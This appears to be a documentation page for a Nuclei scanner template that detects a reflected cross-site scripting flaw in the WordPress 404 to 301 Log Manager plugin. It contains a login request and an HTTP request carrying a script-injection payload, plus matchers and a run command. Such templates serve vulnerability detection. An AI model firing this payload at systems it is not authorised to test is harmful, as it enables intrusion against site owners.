WordPress 404 to 301 Log Manager <3.1.2 - Cross-Site Scripting
ID: 404-to-301-xss
Severity: medium
Author: Akincibor
Tags: wpscan,wp-plugin,xss,wp,wordpress,authenticated
Description
Section titled “Description”WordPress 404 to 301 Log Manager 3.1.2 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
YAML Source
Section titled “YAML Source”id: 404-to-301-xss
info: name: WordPress 404 to 301 Log Manager <3.1.2 - Cross-Site Scripting author: Akincibor severity: medium description: WordPress 404 to 301 Log Manager 3.1.2 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting. reference: - https://wpscan.com/vulnerability/4a310b4f-79fa-4b74-93f8-e4522921abe1 - https://wordpress.org/plugins/404-to-301 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 metadata: max-request: 2 tags: wpscan,wp-plugin,xss,wp,wordpress,authenticated
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=jj4t3-logs&a"><script>alert(1)</script> HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - '"><script>alert(1)</script>' - '404 Error Logs' condition: and
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4a0a004730450220218cc331e257cc5b5c514c5323a256b656cdab8b7b707995bf5a5617f0fdd5a0022100b7f4b42787cd20f218a81e2dae5285d69e28b2a0d4469706b9a8ecec6e33b391:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/404-to-301-xss.yaml"